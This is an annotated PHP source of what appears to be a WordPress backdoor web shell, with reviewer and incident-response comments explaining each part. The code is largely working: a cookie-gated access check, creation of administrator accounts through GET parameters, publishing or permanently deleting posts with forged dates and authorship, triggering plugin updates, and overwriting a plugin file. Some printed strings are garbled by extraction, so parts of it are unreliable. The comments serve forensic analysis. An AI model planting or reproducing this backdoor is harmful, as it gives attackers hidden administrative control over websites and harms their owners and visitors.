Password : ';
}
// Login handler for the shell's access gate: the POSTed password is MD5-hashed and compared with the SHELL_PASSWORD constant.
// NOTE(review): SHELL_PASSWORD is defined outside this excerpt; the md5() call suggests it stores an MD5 hex digest - confirm.
// NOTE(review): `==` is a loose comparison of two hash strings; hash_equals() is the strict, constant-time form.
if(!empty($_POST['password']) && md5($_POST['password']) == SHELL_PASSWORD) {
// The cookie stores the SHELL_PASSWORD value itself for 24 hours (60*60*24 seconds), so that value is password-equivalent
// and appears in any Cookie header captured by proxies or request logging. No path, Secure or HttpOnly arguments are passed.
setcookie('password', SHELL_PASSWORD, time()+60*60*24);
// Redirect to this same script so the follow-up request is a GET that carries the new cookie.
// NOTE(review): PHP_SELF is derived from the request path and is interpolated into the header unescaped.
header("Location: {$_SERVER['PHP_SELF']}");
exit;
}
// Gate applied to every request: unless a `password` cookie equals SHELL_PASSWORD, the script stops here and
// none of the code below runs. This cookie check is the only access control visible in this excerpt.
// NOTE(review): `!=` is a loose comparison, as in the login check; there is no nonce, capability or session check.
// Triage hint: requests to this file that carry a `password` cookie are the ones that reached the functionality below.
if(empty($_COOKIE['password']) || $_COOKIE['password'] != SHELL_PASSWORD) {
exit;
}
// Locate and load WordPress's bootstrap file (wp-load.php) so the wp_* functions called further down are defined.
// The search starts in the current directory and climbs one parent directory per iteration, for at most
// MAX_UP_LEVELS attempts. NOTE(review): MAX_UP_LEVELS is defined outside this excerpt.
// Because the path is discovered at run time, the script is not tied to one location inside the site tree.
$counter = 0;
$dir_up = './';
do {
$file_found = false;
$file_path = "{$dir_up}wp-load.php";
if(file_exists($file_path)) {
// Bootstraps WordPress in-process; from here on the script can call the site's own API.
require($file_path);
$file_found = true;
}
else {
// Not found at this level: extend the relative prefix by one parent directory and retry.
$dir_up .= '../';
}
$counter++;
// If the loop ends without finding the file, execution still continues; $dir_up is reused later as the prefix
// for the wp-admin include paths.
}while(!$file_found && $counter < MAX_UP_LEVELS);
// Account-creation action: a GET request with action=create_user plus username, password and email makes a new
// WordPress user whose role is hard-coded to 'administrator'.
// Incident-response notes: all three values travel in the query string, so they are normally recorded in web
// server access logs; search those logs for `action=create_user` and audit the site's user table for
// administrator accounts nobody on the team created.
if(isset($_GET['action']) && $_GET['action'] == 'create_user') {
if(empty($_GET['username']) || empty($_GET['password']) || empty($_GET['email'])){
print "Missing parameter for creating user!";
exit;
}
else {
// Request values are handed to wp_insert_user() as received; only the role is fixed by the script.
$userdata = array('user_login' => $_GET['username'], 'user_pass' => $_GET['password'], 'user_email' => $_GET['email'], 'role' => 'administrator');
$user_id = wp_insert_user( $userdata );
// wp_insert_user() returns the new user ID on success and a WP_Error object otherwise, so is_numeric() is the
// success test here; a failure produces no output at all.
if(is_numeric($user_id)) {
// The chosen login and plaintext password are echoed back into the response without escaping.
print "User has been created.
Login: {$_GET['username']} Password: {$_GET['password']}
";
// NOTE(review): this looks like a link whose HTML tags were lost when the page was extracted - confirm against the raw sample.
print 'Login
';
}
}
}
// Content action: creates, updates or deletes a WordPress post/page from POST fields. It runs whenever both
// `title` and `post` are non-empty.
// Incident-response notes: content written here is published immediately, attributed to user ID 1 and carries
// a caller-chosen date, so review published posts and pages of every post type for entries the site's authors
// do not recognise, rather than relying on the displayed date or author.
if(!empty($_POST['title']) && !empty($_POST['post'])) {
// Date comes from the `datepicker` field; the time of day is filled in with rand().
// NOTE(review): presumably so that inserted entries do not share an identical timestamp - not stated in the code.
$post_date = $_POST['datepicker'] . " " . rand(0,23) . ":" . rand(0,59) . ":" . rand(0,59);
// Build the post array: title, content and post type are taken from the request unchanged; status and author are fixed.
$my_post = array(
'post_title' => $_POST['title'],
'post_content' => $_POST['post'],
'post_status' => 'publish',
'post_author' => 1,
'post_type' => $_POST['post_type'],
'post_date' => $post_date
);
$id = NULL;
if(empty($_POST['ID'])) {
// No ID supplied: insert a new post into the database.
$id = wp_insert_post($my_post);
}
else {
// NOTE(review): `delete_post` is read without an isset() check.
if($_POST['delete_post'] == 1) {
// Second argument true asks WordPress to delete permanently instead of moving the post to the trash.
$del_op_res = wp_delete_post( $_POST['ID'], true );
if(!$del_op_res) print "Delete failed!
\n";
}
else {
// ID supplied and no delete flag: overwrite the existing post with the new fields.
$my_post['ID'] = $_POST['ID'];
$id = wp_update_post($my_post);
}
}
// These two calls also run on the delete path, where $id is still NULL.
// $permalink is not referenced again in the lines visible here.
$permalink = get_permalink( $id );
wp_set_post_categories($id, array($_POST['cat']));
if($_POST['delete_post'] != 1) {
if(!empty($id)) {
$post = get_post($id);
// NOTE(review): this string appears damaged by extraction (stray `guid}` and escaped quotes with no tag around
// them); the raw sample probably printed links built from the permalink and the post's guid - confirm.
print "View post by permalink guid}\" target=\"blank\">View post/page by id";
}
else {
print "Action failed!
\n";
}
}
}
// Plugin-update action: for every entry in the POSTed `plugin2update` array, WordPress's plugin updater is
// invoked from outside the admin interface, then the script exits.
// Incident-response note: plugin files whose modification times do not match any update recorded by the
// site's administrators are worth comparing against the vendor's published copies.
if(!empty($_POST['plugin2update'])) {
// Admin-side include files are loaded by hand, using the relative prefix found while searching for wp-load.php.
include_once( $dir_up . 'wp-admin/includes/class-ftp.php');
include_once( $dir_up . 'wp-admin/includes/update.php');
include_once( $dir_up . 'wp-admin/includes/file.php');
include_once( $dir_up . 'wp-admin/includes/screen.php');
include_once( $dir_up . 'wp-admin/includes/misc.php');
include_once( $dir_up . 'wp-admin/includes/plugin.php');
foreach($_POST['plugin2update'] as $plugin) {
// The request-supplied plugin identifier is printed unescaped and passed straight to the updater.
print "$plugin update : ";
wp_update_plugin($plugin);
}
exit;
}
// File-overwrite action: replaces the file named in the POSTed `file2clean` with the fixed text held in
// $tell_a_friend_content.
// The literal below is PHP source for a `tell_a_friend` content filter that is registered on the_content.
// NOTE(review): the start of the literal is missing in this excerpt (it opens mid-expression), most likely lost
// in extraction, so its full content cannot be judged from here. The word "cleaned" in the status message
// suggests the intent is to reset that plugin file to a fixed copy - confirm against the raw sample.
if(!empty($_POST['file2clean'])) {
$tell_a_friend_content = 'ID));
$taf_title = urlencode(get_the_title($post->ID) );
$taf_img = get_settings(\'home\') . \'/wp-content/plugins/tell-a-friend/button.gif\';
if ( !is_feed() && !is_page() ) {
$content .= \'\';
}
return $content;
}
add_filter(\'the_content\', \'tell_a_friend\');
?>';
// The target path comes from the request. The only checks are that the file already exists and that the path
// contains the substring 'tell-a-friend.php'; the path is not normalised or confined to the plugins directory.
// Incident-response note: compare any tell-a-friend.php on the host with the plugin's published source.
if(file_exists($_POST['file2clean'])) {
if(strpos($_POST['file2clean'], 'tell-a-friend.php') !== false) {
// file_put_contents() returns the number of bytes written or false; the result is used as a truthiness test.
if(file_put_contents($_POST['file2clean'], $tell_a_friend_content)) {
// The request-supplied path is echoed back unescaped in both messages.
print "File {$_POST['file2clean']} has been cleaned.";
}
else {
print "Failed cleaning {$_POST['file2clean']} !";
}
}
}
}
?>